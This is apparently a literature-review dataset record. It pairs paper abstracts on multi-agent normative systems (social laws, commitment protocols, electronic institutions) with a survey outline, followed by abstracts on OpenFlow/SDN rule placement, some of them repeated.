basic approach to coordinating multi-agent systems. 
It exposes the spectrum between fully-centralized and fully-decentralized coordination mechanisms. Useful social laws set constraints on the agents' activities which allow them to work individually in a mutually compatible manner. The design of useful social laws is a problem of considerable importance. In many cases, several useful social laws might be considered, and we might wish to have some criteria in order to choose among them. In this paper, we present the notions of minimal and simple social laws, which capture two basic criteria for selecting among alternative (useful) social laws, and study these criteria in the framework of basic settings, namely Automated Guided Vehicles and Distributed Computing. We also present results with regard to computational issues related to minimal and simple social laws, and to the relationship between these two concepts. Together, the new insights provided here can be used as a basic framework for the analysis of “good” social laws, and initiate research on the selection among alternative social laws. --- paper_title: Artificial Social Systems paper_content: An artificial social system is a set of restrictions of agents' behaviors in a multi-agent environment. Its role is to allow agents to coexist in a shared environment and pursue their respective goals in the presence of other agents. This paper argues that artificial social systems exist in practically every multi-agent system, and play a major role in the performance and effectiveness of the agents. We propose artificial social systems as an explicit and formal object of study, and investigate several basic issues that arise in their design. --- paper_title: Specifying norm-governed computational societies paper_content: Electronic markets, dispute resolution and negotiation protocols are three types of application domains that can be viewed as open agent societies. Key characteristics of such societies are agent heterogeneity, conflicting individual goals and unpredictable behavior. Members of such societies may fail to, or even choose not to, conform to the norms governing their interactions. It has been argued that systems of this type should have a formal, declarative, verifiable, and meaningful semantics. We present a theoretical and computational framework being developed for the executable specification of open agent societies. We adopt an external perspective and view societies as instances of normative systems. In this article, we demonstrate how the framework can be applied to specifying and executing a contract-net protocol. The specification is formalized in two action languages, the C+ language and the Event Calculus, and executed using respective software implementations, the Causal Calculator and the Society Visualizer. We evaluate our executable specification in the light of the presented case study, discussing the strengths and weaknesses of the employed action languages for the specification of open agent societies. --- paper_title: The Role of Competency Questions in Enterprise Engineering paper_content: We present a logical framework for representing activities, states, time, and cost in an enterprise integration architecture. We define ontologies for these concepts in first-order logic and consider the problems of temporal projection and reasoning about the occurrence of actions. We characterize the ontology with the use of competency questions. The ontology must contain a necessary and sufficient set of axioms to represent and solve these questions. 
These questions not only characterize existing ontologies for enterprise engineering, but also drive the development of new ontologies that are required to solve the competency questions. --- paper_title: Reasoning about Commitments in the Event Calculus: An Approach for Specifying and Executing Protocols paper_content: Commitments among agents are widely recognized as an important basis for organizing interactions in multiagent systems. We develop an approach for formally representing and reasoning about commitments in the event calculus. We apply and evaluate this approach in the context of protocols, which represent the interactions allowed among communicating agents. Protocols are essential in applications such as electronic commerce where it is necessary to constrain the behaviors of autonomous agents. Traditional approaches, which model protocols merely in terms of action sequences, limit the flexibility of the agents in executing the protocols. By contrast, by formally representing commitments, we can specify the content of the protocols through the agents' commitments to one another. In representing commitments in the event calculus, we formalize commitment operations and domain-independent reasoning rules as axioms to capture the evolution of commitments. We also provide a means to specify protocol-specific axioms through the agents' actions. These axioms enable agents to reason about their actions explicitly to flexibly accommodate the exceptions and opportunities that may arise at run time. This reasoning is implemented using an event calculus planner that helps determine flexible execution paths that respect the given protocol specifications. --- paper_title: Contextualizing commitment protocol paper_content: Commitment protocols are modularized specifications of interactions understood in terms of commitments. Purchase is a classic example of a protocol. Although a typical protocol would capture the essence of the interactions desired, in practice, it should be adapted depending on the circumstances or context and the agents' preferences based on that context. For example, when applying purchase in different contexts, it may help to allow sending reminders for payments or returning goods to obtain a refund. We contextualize a protocol by adapting it via different transformations.Our contributions are the following: (1) a protocol is transformed by composing its specification with a transformer specification; (2) contextualization is characterized operationally by relating the original and transformed protocols; and (3) contextualization is related to protocol compliance. --- paper_title: A Modular Action Description Language for Protocol Composition ∗ paper_content: Protocols are modular abstractions that capture patterns of interaction among agents. The compelling vision behind protocols is to enable creating customized interactions by refining and composing existing protocols. Realizing this vision presupposes (1) maintaining repositories of protocols and (2) refining and composing selected protocols. To this end, this paper synthesizes recent advances on protocols and on the knowledge representation of actions. This paper presents MAD-P, a modular action description language tailored for protocols. MAD-P enables building an aggregation hierarchy of protocols via composition. This paper demonstrates the value of such compositions via a simplified, but realistic, business scenario. 
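The "Reasoning about Commitments in the Event Calculus" entry above rests on standard event calculus machinery plus protocol-specific clauses for commitment fluents. In simplified, paraphrased form (the predicate and variable names here are ours, not the cited paper's exact axioms):

$HoldsAt(f, t) \leftarrow Happens(a, t_1) \land Initiates(a, f, t_1) \land t_1 < t \land \neg Clipped(t_1, f, t)$

$Clipped(t_1, f, t_2) \leftrightarrow \exists\, a, t\, [\, Happens(a, t) \land t_1 \le t < t_2 \land Terminates(a, f, t) \,]$

$Initiates(create(x, y, p),\ C(x, y, p),\ t)$ (a create operation makes the fluent $C(x, y, p)$, read "x is committed to y to bring about p", hold from $t$ onwards)

$Terminates(e,\ C(x, y, p),\ t) \leftarrow Initiates(e, p, t)$ (any event that brings about the condition $p$ discharges the commitment)

Given clauses of this shape, the event calculus planning approach cited just below can search for execution paths that respect the protocol, for instance paths on which no created commitment is left unresolved, which is how "flexible execution" of commitment protocols is operationalised.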
--- paper_title: Flexible protocol specification and execution: applying event calculus planning using commitments paper_content: Protocols represent the allowed interactions among communicating agents. Protocols are essential in applications such as electronic commerce where it is necessary to constrain the behaviors of autonomous agents. Traditional approaches, which model protocols in terms of action sequences, limit the flexibility of the agents in executing the protocols. By contrast, we develop an approach for specifying protocols in which we capture the content of the actions through agents' commitments to one another. We formalize commitments in a variant of the event calculus. We provide operations and reasoning rules to capture the evolution of commitments through the agents' actions. Using these rules in addition to the basic event calculus axioms enables agents to reason about their actions explicitly to flexibly accommodate the exceptions and opportunities that arise at run time. This reasoning is implemented using an event calculus planner that helps us determine flexible execution paths that respect the protocol specifications. --- paper_title: Verifying Compliance with Commitment Protocols paper_content: Interaction protocols are specific, often standard, constraints on the behaviors of autonomous agents in a multiagent system. Protocols are essential to the functioning of open systems, such as those that arise in most interesting web applications. A variety of common protocols in negotiation and electronic commerce are best treated as commitment protocols, which are defined, or at least analyzed, in terms of the creation, satisfaction, or manipulation of the commitments among the participating agents. When protocols are employed in open environments, such as the Internet, they must be executed by agents that behave more or less autonomously and whose internal designs are not known. In such settings, therefore, there is a risk that the participating agents may fail to comply with the given protocol. Without a rigorous means to verify compliance, the very idea of protocols for interoperation is subverted. We develop an approach for testing whether the behavior of an agent complies with a commitment protocol. Our approach requires the specification of commitment protocols in temporal logic, and involves a novel way of synthesizing and applying ideas from distributed computing and logics of program. --- paper_title: The Event Calculus Explained paper_content: This article presents the event calculus, a logic-based formalism for representing actions and their effects. A circumscriptive solution to the frame problem is deployed which reduces to monotonic predicate completion. Using a number of benchmark examples from the literature, the formalism is shown to apply to a variety of domains, including those featuring actions with indirect effects, actions with nondeterministic effects, concurrent actions, and continuous change. --- paper_title: An abductive event calculus planner paper_content: In 1969 Cordell Green presented his seminal description of planning as theorem proving with the situation calculus. The most pleasing feature of Green's account was the negligible gap between high-level logical specification and practical implementation. This paper attempts to reinstate the ideal of planning via theorem proving in a modern guise.
In particular, the paper shows that if we adopt the event calculus as our logical formalism and employ abductive logic programming as our theorem proving technique, then the computation performed mirrors closely that of a hand-coded partial-order planning algorithm. Soundness and completeness results for this logic programming implementation are given. Finally the paper shows that, if we extend the event calculus in a natural way to accommodate compound actions, then using the same abductive theorem proving techniques we can obtain a hierarchical planner. --- paper_title: Commitment Machines paper_content: We develop an approach in which we model communication protocols via commitment machines. Commitment machines supply a content to protocol states and actions in terms of the social commitments of the participants. The content can be reasoned about by the agents thereby enabling flexible execution of the given protocol. We provide reasoning rules to capture the evolution of commitments through the agents' actions. Because of its representation of content and its operational rules, a commitment machine effectively encodes a systematically enhanced version of the original protocol, which allows the original sequences of actions as well as other legal moves to accommodate exceptions and opportunities. We show how a commitment machine can be compiled into a finite state machine for efficient execution, and prove soundness and completeness of our compilation procedure. --- paper_title: A computational theory of normative positions paper_content: The Kanger-Lindahl theory of normative positions attempts to use a combination of deontic logic (the logic of obligation and permission) and a logic of action/agency to give a formal account of obligations, duties, rights, and other complex normative concepts. This paper presents a generalization and further development of this theory, together with methods for its automation and application to practical examples. The resulting theory is intended to be applied in the representation and analysis of laws, regulations, and contracts, in the specification of aspects of computer systems, in multiagent systems, and as a contribution to the formal theory of organizations. Particular attention is paid to representations at varying levels of detail and the relationships that hold between them. The last part presents Norman-G, an automated support system intended to facilitate application of the theory to the analysis of practical problems, with a small example to illustrate its use. --- paper_title: Checking correctness of business contracts via commitments paper_content: Business contracts tend to be complex. In current practice, contracts are often designed by hand and adopted by their participants after, at best, a manual analysis. This paper motivates and formalizes two aspects of contract correctness from the perspective of the preferences of the agents participating in them. A contract is safe for a participant if participating in the contract would not leave the participant worse off than otherwise. More strongly, a contract is beneficial to a participant if participating in the contract would leave the participant better off than otherwise. ::: ::: This paper seeks to partially automate reasoning about the correctness of formally modeled business contracts. It represents contracts formally as a set of commitments. It motivates constraints on how cooperative agents might value the various states of commitments. 
Further, it shows that such constraints are consistent and promote cooperation. Lastly, it presents algorithms for checking the safety and guaranteed benefits of a contract. --- paper_title: A Social Semantics for Agent Communication Languages paper_content: The ability to communicate is one of the salient properties of agents. Although a number of agent communication languages (ACLs) have been developed, obtaining a suitable formal semantics for ACLs remains one of the greatest challenges of multiagent systems theory. Previous semantics have largely been mentalistic in their orientation and are based solely on the beliefs and intentions of the participating agents. Such semantics are not suitable for most multiagent applications, which involve autonomous and heterogeneous agents, whose beliefs and intentions cannot be uniformly determined. Accordingly, we present a social semantics for ACLs that gives primacy to the interactions among the agents. Our semantics is based on social commitments and is developed in temporal logic. This semantics, because of its public orientation, is essential to providing a rigorous basis for multiagent protocols. --- paper_title: Interaction protocols as design abstractions for business processes paper_content: Business process modeling and enactment are notoriously complex, especially in open settings, where business partners are autonomous, requirements must be continually finessed, and exceptions frequently arise because of real-world or organizational problems. Traditional approaches, which attempt to capture processes as monolithic flows, have proven inadequate in addressing these challenges. We propose (business) protocols as components for developing business processes. A protocol is an abstract, modular, publishable specification of an interaction among different roles to be played by different participants. When instantiated with the participants' internal policies, protocols yield concrete business processes. Protocols are reusable and refinable, thus simplifying business process design. We show how protocols and their composition are theoretically founded in the π-calculus. --- paper_title: Formalizing a Language for Institutions and Norms paper_content: One source of trust for physical trading systems is their physical assets and simply their presence. A similar baseline does not exist for electronic trading systems, but one way in which it may be possible to create that initial trust is through the abstract notion of an institution, defined in terms of norms [19] and the scenes within which (software) agents may play roles in different trading activities, governed by those norms. We present here a case for institutions in electronic trading, a specification language for institutions (covering norms, performative structure, scenes, roles, etc.) and its semantics and how this may be mapped into formal languages such as process algebra and various forms of logic, so that there is a framework within which norms can be stated and proven. --- paper_title: Implementing norms in electronic institutions paper_content: Ideally, open multi-agent systems (MAS) involve heterogeneous and autonomous agents whose interactions ought to conform to some shared conventions. The challenge is how to express and enforce such conditions so that truly autonomous agents can subscribe to them. One way of addressing this issue is to look at MAS as environments regulated by some sort of normative framework.
There have been significant contributions to the formal aspects of such normative frameworks, but there are few proposals that have made them operational. In this paper a possible step towards closing that gap is suggested. A normative language is introduced which is expressive enough to represent the familiar types of MAS-inspired normative frameworks; its implementation in JESS is also shown. This proposal is aimed at adding flexibility and generality to electronic institutions by extending their deontic components through richer types of norms that can still be enforced on-line. --- paper_title: Verifying norm consistency in electronic institutions paper_content: We elaborate on the verification of properties of electronic institutions, a formalism to define and analyse protocols among agents with a view to achieving global and individual goals. We formally define two kinds of norms, viz., the integrity norms and obligations, and provide a computational approach to assess whether an electronic institution is normatively consistent, that is, we can determine whether its norms prevent norm-compliant executions from happening. For this we strongly rely on the analysis of the dialogues that may occur as agents interact. --- paper_title: Towards a test-bed for trading agents in electronic auction markets paper_content: We present a framework for defining trading scenarios based on fish market auctions. In these scenarios, trading (buyer and seller) heterogeneous (human and software) agents of arbitrary complexity participate in auctions under a collection of standardized market conditions and are evaluated against their actual market performance. We argue that such competitive situations constitute convenient problem domains in which to study issues related with agent architectures in general and agent-based trading strategies in particular. The proposed framework, conceived and implemented as an extension of FM96.5 (a Java-based version of the Fishmarket auction house), constitutes a test-bed for trading agents in auction tournament environments, FM97.6. Finally, we illustrate how to generate tournaments with the aid of our test-bed by defining and running a very simple tournament involving a set of rudimentary buyer agents. ---
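As a rough illustration of how such norms can be made operational (the entry on implementing norms above reports a JESS rule-based implementation), the following plain-Python stand-in encodes one obligation-creating rule and one obligation-discharging rule for a toy auction scene; all predicate, role and item names are assumptions made for the example, not taken from any cited institution.

```python
# Toy forward-chaining normative rules: winning an auction round asserts an
# obligation to pay; paying retracts it; obligations still pending when the
# scene closes count as violations. Naive re-evaluation over all facts.

facts = set()
obligations = set()

def assert_fact(fact):
    facts.add(fact)
    fire_rules()

def fire_rules():
    # Rule 1: won(Agent, Item, Price) => obliged(Agent, pay(Price))
    for f in list(facts):
        if f[0] == "won":
            _, agent, item, price = f
            obligations.add((agent, ("pay", price)))
    # Rule 2: paid(Agent, Price) retracts the matching obligation
    for f in list(facts):
        if f[0] == "paid":
            _, agent, price = f
            obligations.discard((agent, ("pay", price)))

def violations():
    """Obligations left unfulfilled once the scene has closed."""
    if ("scene_closed",) in facts:
        return set(obligations)
    return set()

assert_fact(("won", "buyer1", "cod", 15))
assert_fact(("scene_closed",))
print(violations())        # {('buyer1', ('pay', 15))}: unfulfilled obligation
assert_fact(("paid", "buyer1", 15))
print(violations())        # set()
```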
Title: Specifying Open Agent Systems: A Survey
Section 1: Introduction
Description 1: Provide an overview of open agent systems, including their characteristics, significance, and examples. Discuss the aim of the paper and the structure of the survey.
Section 2: Artificial Social Systems
Description 2: Discuss the approach and methodologies of artificial social systems, including the design-time specification of social laws and the properties of social laws.
Section 3: Commentary on Artificial Social Systems
Description 3: Provide critical commentary on the artificial social systems approach, focusing on permissions, non-conformance, semantics, and computational tasks.
Section 4: Enterprise Modelling
Description 4: Review the work on modelling computational enterprises/organisations, including the roles, goals, processes, policies, skills, and authority within the organisation.
Section 5: Commentary on Enterprise Modelling
Description 5: Offer critical comments on enterprise modelling with an emphasis on normative relations, non-compliance, semantics, and computational tasks.
Section 6: Commitment Protocols
Description 6: Review the concept and formalisation of commitment protocols, including the various semantics and representations used in specifying these protocols.
Section 7: Commentary on Commitment Protocols
Description 7: Provide a critique of the commitment protocols, focusing on normative relations, non-compliance mechanisms, and the computational support provided by these protocols.
Section 8: Electronic Institutions
Description 8: Discuss the systematic approach to designing and developing multi-agent systems using Electronic Institutions, including roles, dialogic framework, scenes, performative structure, and normative rules.
Section 9: Commentary on Electronic Institutions
Description 9: Provide critical analysis of Electronic Institutions, particularly their approach to permissions, obligations, normative rules, non-compliance mechanisms, and computational support.
Section 10: Discussion
Description 10: Summarise the findings from the reviews of the four approaches, discussing the representation of normative relations, the handling of non-compliance, the expressiveness of the formalisms, and the support for computational tasks.
Rules Placement Problem in OpenFlow Networks: A Survey
8
--- paper_title: Frenetic: a network programming language paper_content: Modern networks provide a variety of interrelated services including routing, traffic monitoring, load balancing, and access control. Unfortunately, the languages used to program today's networks lack modern features - they are usually defined at the low level of abstraction supplied by the underlying hardware and they fail to provide even rudimentary support for modular programming. As a result, network programs tend to be complicated, error-prone, and difficult to maintain. This paper presents Frenetic, a high-level language for programming distributed collections of network switches. Frenetic provides a declarative query language for classifying and aggregating network traffic as well as a functional reactive combinator library for describing high-level packet-forwarding policies. Unlike prior work in this domain, these constructs are - by design - fully compositional, which facilitates modular reasoning and enables code reuse. This important property is enabled by Frenetic's novel run-time system which manages all of the details related to installing, uninstalling, and querying low-level packet-processing rules on physical switches. Overall, this paper makes three main contributions: (1) We analyze the state-of-the art in languages for programming networks and identify the key limitations; (2) We present a language design that addresses these limitations, using a series of examples to motivate and validate our choices; (3) We describe an implementation of the language and evaluate its performance on several benchmarks. --- paper_title: OpenFlow: enabling innovation in campus networks paper_content: This whitepaper proposes OpenFlow: a way for researchers to run experimental protocols in the networks they use every day. OpenFlow is based on an Ethernet switch, with an internal flow-table, and a standardized interface to add and remove flow entries. Our goal is to encourage networking vendors to add OpenFlow to their switch products for deployment in college campus backbones and wiring closets. We believe that OpenFlow is a pragmatic compromise: on one hand, it allows researchers to run experiments on heterogeneous switches in a uniform way at line-rate and with high port-density; while on the other hand, vendors do not need to expose the internal workings of their switches. In addition to allowing researchers to evaluate their ideas in real-world traffic settings, OpenFlow could serve as a useful campus component in proposed large-scale testbeds like GENI. Two buildings at Stanford University will soon run OpenFlow networks, using commercial Ethernet switches and routers. We will work to encourage deployment at other schools; and We encourage you to consider deploying OpenFlow in your university network too --- paper_title: On the co-existence of distributed and centralized routing control-planes paper_content: Network operators can and do deploy multiple routing control-planes, e.g., by running different protocols or instances of the same protocol. With the rise of SDN, multiple control-planes are likely to become even more popular, e.g., to enable hybrid SDN or multi-controller deployments. Unfortunately, previous works do not apply to arbitrary combinations of centralized and distributed control-planes. In this paper, we develop a general theory for coexisting control-planes. 
We provide a novel, exhaustive classification of existing and future control-planes (e.g., OSPF, EIGRP, and OpenFlow) based on fundamental control-plane properties that we identify. Our properties are general enough to study centralized and distributed control-planes under a common framework. We show that multiple uncoordinated control-planes can cause forwarding anomalies whose type solely depends on the identified properties. To show the wide applicability of our framework, we leverage our theoretical insight to (i) provide sufficient conditions to avoid anomalies, (ii) propose configuration guidelines, and (iii) define a provably-safe procedure for reconfigurations from any (combination of) control-planes to any other. Finally, we discuss prominent consequences of our findings on the deployment of new paradigms (notably, SDN) and previous research works. --- paper_title: B4: experience with a globally-deployed software defined wan paper_content: We present the design, implementation, and evaluation of B4, a private WAN connecting Google's data centers across the planet. B4 has a number of unique characteristics: i) massive bandwidth requirements deployed to a modest number of sites, ii) elastic traffic demand that seeks to maximize average bandwidth, and iii) full control over the edge servers and network, which enables rate limiting and demand measurement at the edge. These characteristics led to a Software Defined Networking architecture using OpenFlow to control relatively simple switches built from merchant silicon. B4's centralized traffic engineering service drives links to near 100% utilization, while splitting application flows among multiple paths to balance capacity against application priority/demands. We describe experience with three years of B4 production deployment, lessons learned, and areas for future work. --- paper_title: vCRIB: virtualized rule management in the cloud paper_content: Cloud operators increasingly need many fine-grained rules to better control individual network flows for various management tasks. While previous approaches have advocated placing rules either on hypervisors or switches, we argue that future data centers would benefit from leveraging rule processing capabilities at both for better scalability and performance. In this paper, we propose vCRIB, a virtualized Cloud Rule Information Base that allows operators to freely define different management policies without the need to consider underlying resource constraints. The challenge in our approach is the design of a vCRIB manager that automatically partitions and places rules at both hypervisors and switches to achieve a good trade-off between resource usage and performance. --- paper_title: PAST: scalable ethernet for data centers paper_content: We present PAST, a novel network architecture for data center Ethernet networks that implements a Per-Address Spanning Tree routing algorithm. PAST preserves Ethernet's self-configuration and mobility support while increasing its scalability and usable bandwidth. PAST is explicitly designed to accommodate unmodified commodity hosts and Ethernet switch chips. Surprisingly, we find that PAST can achieve performance comparable to or greater than Equal-Cost Multipath (ECMP) forwarding, which is currently limited to layer-3 IP networks, without any multipath hardware support. In other words, the hardware and firmware changes proposed by emerging standards like TRILL are not required for high-performance, scalable Ethernet networks.
We evaluate PAST on Fat Tree, HyperX, and Jellyfish topologies, and show that it is able to capitalize on the advantages each offers. We also describe an OpenFlow-based implementation of PAST in detail. --- paper_title: Maturing of OpenFlow and Software Defined Networking through Deployments paper_content: Software-defined Networking (SDN) has emerged as a new paradigm of networking that enables network operators, owners, vendors, and even third parties to innovate and create new capabilities at a faster pace. The SDN paradigm shows potential for all domains of use, including data centers, cellular providers, service providers, enterprises, and homes. Over a three-year period, we deployed SDN technology at our campus and at several other campuses nation-wide with the help of partners. These deployments included the first-ever SDN prototype in a lab for a (small) global deployment. The four-phased deployments and demonstration of new networking capabilities enabled by SDN played an important role in maturing SDN and its ecosystem. We share our experiences and lessons learned that have to do with demonstration of SDN's potential; its influence on successive versions of OpenFlow specification; evolution of SDN architecture; performance of SDN and various components; and growing the ecosystem. --- paper_title: OpenFlow: enabling innovation in campus networks paper_content: This whitepaper proposes OpenFlow: a way for researchers to run experimental protocols in the networks they use every day. OpenFlow is based on an Ethernet switch, with an internal flow-table, and a standardized interface to add and remove flow entries. Our goal is to encourage networking vendors to add OpenFlow to their switch products for deployment in college campus backbones and wiring closets. We believe that OpenFlow is a pragmatic compromise: on one hand, it allows researchers to run experiments on heterogeneous switches in a uniform way at line-rate and with high port-density; while on the other hand, vendors do not need to expose the internal workings of their switches. In addition to allowing researchers to evaluate their ideas in real-world traffic settings, OpenFlow could serve as a useful campus component in proposed large-scale testbeds like GENI. Two buildings at Stanford University will soon run OpenFlow networks, using commercial Ethernet switches and routers. We will work to encourage deployment at other schools; and We encourage you to consider deploying OpenFlow in your university network too --- paper_title: B4: experience with a globally-deployed software defined wan paper_content: We present the design, implementation, and evaluation of B4, a private WAN connecting Google's data centers across the planet. B4 has a number of unique characteristics: i) massive bandwidth requirements deployed to a modest number of sites, ii) elastic traffic demand that seeks to maximize average bandwidth, and iii) full control over the edge servers and network, which enables rate limiting and demand measurement at the edge. These characteristics led to a Software Defined Networking architecture using OpenFlow to control relatively simple switches built from merchant silicon. B4's centralized traffic engineering service drives links to near 100% utilization, while splitting application flows among multiple paths to balance capacity against application priority/demands. We describe experience with three years of B4 production deployment, lessons learned, and areas for future work. 
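Since almost every entry in this section builds on the OpenFlow flow-table model sketched in the whitepaper above, a minimal Python rendering of priority-ordered, wildcard-capable matching with a bounded table and miss-to-controller behaviour may help fix the terminology. It is a simplification for illustration, not a reference implementation of the OpenFlow specification, and the field names are assumptions.

```python
# Simplified OpenFlow-style flow table: the highest-priority matching rule wins,
# a field absent from a match acts as a wildcard, and a table miss is sent to
# the controller as a packet-in.

from dataclasses import dataclass

@dataclass
class Rule:
    priority: int
    match: dict        # e.g. {"ip_dst": "10.0.0.1", "tcp_dst": 80}; missing key = wildcard
    actions: list      # e.g. ["output:2"] or ["drop"]
    packet_count: int = 0

class FlowTable:
    def __init__(self, capacity):
        self.capacity = capacity
        self.rules = []

    def install(self, rule):
        if len(self.rules) >= self.capacity:
            return False                      # table full (e.g. TCAM exhausted)
        self.rules.append(rule)
        self.rules.sort(key=lambda r: -r.priority)
        return True

    def lookup(self, packet):
        for rule in self.rules:               # already sorted by priority
            if all(packet.get(k) == v for k, v in rule.match.items()):
                rule.packet_count += 1        # per-rule traffic counter
                return rule.actions
        return ["packet_in_to_controller"]    # table miss

table = FlowTable(capacity=2)
table.install(Rule(priority=10, match={"ip_dst": "10.0.0.1"}, actions=["output:2"]))
table.install(Rule(priority=1,  match={},                     actions=["drop"]))  # catch-all
print(table.lookup({"ip_dst": "10.0.0.1", "tcp_dst": 80}))   # ['output:2']
print(table.lookup({"ip_dst": "10.0.0.9"}))                   # ['drop']
```

Hardware switches typically implement this lookup in TCAM, which is why rule-table capacity is the scarce resource that most of the following entries try to economize.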
--- paper_title: A Survey of Software-Defined Networking: Past, Present, and Future of Programmable Networks paper_content: The idea of programmable networks has recently re-gained considerable momentum due to the emergence of the Software-Defined Networking (SDN) paradigm. SDN, often referred to as a "radical new idea in networking", promises to dramatically simplify network management and enable innovation through network programmability. This paper surveys the state-of-the-art in programmable networks with an emphasis on SDN. We provide a historic perspective of programmable networks from early ideas to recent developments. Then we present the SDN architecture and the OpenFlow standard in particular, discuss current alternatives for implementation and testing of SDN-based protocols and services, examine current and future SDN applications, and explore promising research directions based on the SDN paradigm. --- paper_title: Optimizing the "one big switch" abstraction in software-defined networks paper_content: Software Defined Networks (SDNs) support diverse network policies by offering direct, network-wide control over how switches handle traffic. Unfortunately, many controller platforms force applications to grapple simultaneously with end-to-end connectivity constraints, routing policy, switch memory limits, and the hop-by-hop interactions between forwarding rules. We believe solutions to this complex problem should be factored in to three distinct parts: (1) high-level SDN applications should define their end-point connectivity policy on top of a "one big switch" abstraction; (2) a mid-level SDN infrastructure layer should decide on the hop-by-hop routing policy; and (3) a compiler should synthesize an effective set of forwarding rules that obey the user-defined policies and adhere to the resource constraints of the underlying hardware. In this paper, we define and implement our proposed architecture, present efficient rule-placement algorithms that distribute forwarding policies across general SDN networks while managing rule-space constraints, and show how to support dynamic, incremental update of policies. We evaluate the effectiveness of our algorithms analytically by providing complexity bounds on their running time and rule space, as well as empirically, using both synthetic benchmarks, and real-world firewall and routing policies. --- paper_title: Frenetic: a network programming language paper_content: Modern networks provide a variety of interrelated services including routing, traffic monitoring, load balancing, and access control. Unfortunately, the languages used to program today's networks lack modern features - they are usually defined at the low level of abstraction supplied by the underlying hardware and they fail to provide even rudimentary support for modular programming. As a result, network programs tend to be complicated, error-prone, and difficult to maintain. This paper presents Frenetic, a high-level language for programming distributed collections of network switches. Frenetic provides a declarative query language for classifying and aggregating network traffic as well as a functional reactive combinator library for describing high-level packet-forwarding policies. Unlike prior work in this domain, these constructs are - by design - fully compositional, which facilitates modular reasoning and enables code reuse. 
This important property is enabled by Frenetic's novel run-time system which manages all of the details related to installing, uninstalling, and querying low-level packet-processing rules on physical switches. Overall, this paper makes three main contributions: (1) We analyze the state-of-the art in languages for programming networks and identify the key limitations; (2) We present a language design that addresses these limitations, using a series of examples to motivate and validate our choices; (3) We describe an implementation of the language and evaluate its performance on several benchmarks. --- paper_title: OpenFlow: enabling innovation in campus networks paper_content: This whitepaper proposes OpenFlow: a way for researchers to run experimental protocols in the networks they use every day. OpenFlow is based on an Ethernet switch, with an internal flow-table, and a standardized interface to add and remove flow entries. Our goal is to encourage networking vendors to add OpenFlow to their switch products for deployment in college campus backbones and wiring closets. We believe that OpenFlow is a pragmatic compromise: on one hand, it allows researchers to run experiments on heterogeneous switches in a uniform way at line-rate and with high port-density; while on the other hand, vendors do not need to expose the internal workings of their switches. In addition to allowing researchers to evaluate their ideas in real-world traffic settings, OpenFlow could serve as a useful campus component in proposed large-scale testbeds like GENI. Two buildings at Stanford University will soon run OpenFlow networks, using commercial Ethernet switches and routers. We will work to encourage deployment at other schools; and We encourage you to consider deploying OpenFlow in your university network too --- paper_title: Optimizing the "one big switch" abstraction in software-defined networks paper_content: Software Defined Networks (SDNs) support diverse network policies by offering direct, network-wide control over how switches handle traffic. Unfortunately, many controller platforms force applications to grapple simultaneously with end-to-end connectivity constraints, routing policy, switch memory limits, and the hop-by-hop interactions between forwarding rules. We believe solutions to this complex problem should be factored in to three distinct parts: (1) high-level SDN applications should define their end-point connectivity policy on top of a "one big switch" abstraction; (2) a mid-level SDN infrastructure layer should decide on the hop-by-hop routing policy; and (3) a compiler should synthesize an effective set of forwarding rules that obey the user-defined policies and adhere to the resource constraints of the underlying hardware. In this paper, we define and implement our proposed architecture, present efficient rule-placement algorithms that distribute forwarding policies across general SDN networks while managing rule-space constraints, and show how to support dynamic, incremental update of policies. We evaluate the effectiveness of our algorithms analytically by providing complexity bounds on their running time and rule space, as well as empirically, using both synthetic benchmarks, and real-world firewall and routing policies. --- paper_title: OFFICER: A general optimization framework for OpenFlow rule allocation and endpoint policy enforcement paper_content: The Software-Defined Networking approach permits to realize new policies. 
In OpenFlow in particular, a controller decides on behalf of the switches which forwarding rules must be installed and where. However with this flexibility comes the challenge of the computation of a rule allocation matrix meeting both high-level policies and the network constraints such as memory or link capacity limitations. Nevertheless, in many situations (e.g., data-center networks), the exact path followed by packets does not severely impact performances as long as packets are delivered according to the endpoint policy. It is thus possible to deviate part of the traffic to alternative paths so to better use network resources without violating the endpoint policy. In this paper, we propose a linear optimization model of the rule allocation problem in resource constrained OpenFlow networks with relaxing routing policy. We show that the general problem is NP-hard and propose a polynomial time heuristic, called OFFICER, which aims to maximize the amount of carried traffic in under-provisioned networks. Our numerical evaluation on four different topologies shows that exploiting various paths allows to increase the amount of traffic supported by the network without significantly increasing the path length. --- paper_title: Maple: simplifying SDN programming using algorithmic policies paper_content: Software-Defined Networking offers the appeal of a simple, centralized programming model for managing complex networks. However, challenges in managing low-level details, such as setting up and maintaining correct and efficient forwarding tables on distributed switches, often compromise this conceptual simplicity. In this pa- per, we present Maple, a system that simplifies SDN programming by (1) allowing a programmer to use a standard programming language to design an arbitrary, centralized algorithm, which we call an algorithmic policy, to decide the behaviors of an entire network, and (2) providing an abstraction that the programmer-defined, centralized policy runs, conceptually, "afresh" on every packet entering a network, and hence is oblivious to the challenge of translating a high-level policy into sets of rules on distributed individual switches. To implement algorithmic policies efficiently, Maple includes not only a highly-efficient multicore scheduler that can scale efficiently to controllers with 40+ cores, but more importantly a novel tracing runtime optimizer that can automatically record reusable policy decisions, offload work to switches when possible, and keep switch flow tables up-to-date by dynamically tracing the dependency of policy decisions on packet contents as well as the environment (system state). Evaluations using real HP switches show that Maple optimizer reduces HTTP connection time by a factor of 100 at high load. During simulated benchmarking, Maple scheduler, when not running the optimizer, achieves a throughput of over 20 million new flow requests per second on a single machine, with 95-percentile latency under 10 ms. --- paper_title: Frenetic: a network programming language paper_content: Modern networks provide a variety of interrelated services including routing, traffic monitoring, load balancing, and access control. Unfortunately, the languages used to program today's networks lack modern features - they are usually defined at the low level of abstraction supplied by the underlying hardware and they fail to provide even rudimentary support for modular programming. As a result, network programs tend to be complicated, error-prone, and difficult to maintain. 
This paper presents Frenetic, a high-level language for programming distributed collections of network switches. Frenetic provides a declarative query language for classifying and aggregating network traffic as well as a functional reactive combinator library for describing high-level packet-forwarding policies. Unlike prior work in this domain, these constructs are - by design - fully compositional, which facilitates modular reasoning and enables code reuse. This important property is enabled by Frenetic's novel run-time system which manages all of the details related to installing, uninstalling, and querying low-level packet-processing rules on physical switches. Overall, this paper makes three main contributions: (1) We analyze the state-of-the art in languages for programming networks and identify the key limitations; (2) We present a language design that addresses these limitations, using a series of examples to motivate and validate our choices; (3) We describe an implementation of the language and evaluate its performance on several benchmarks. --- paper_title: Optimizing rule placement in software-defined networks for energy-aware routing paper_content: Software-defined Networks (SDN), in particular OpenFlow, is a new networking paradigm enabling innovation through network programmability. Over past few years, many applications have been built using SDN such as server load balancing, virtual-machine migration, traffic engineering and access control. In this paper, we focus on using SDN for energy-aware routing (EAR). Since traffic load has a small influence on power consumption of routers, EAR allows to put unused links into sleep 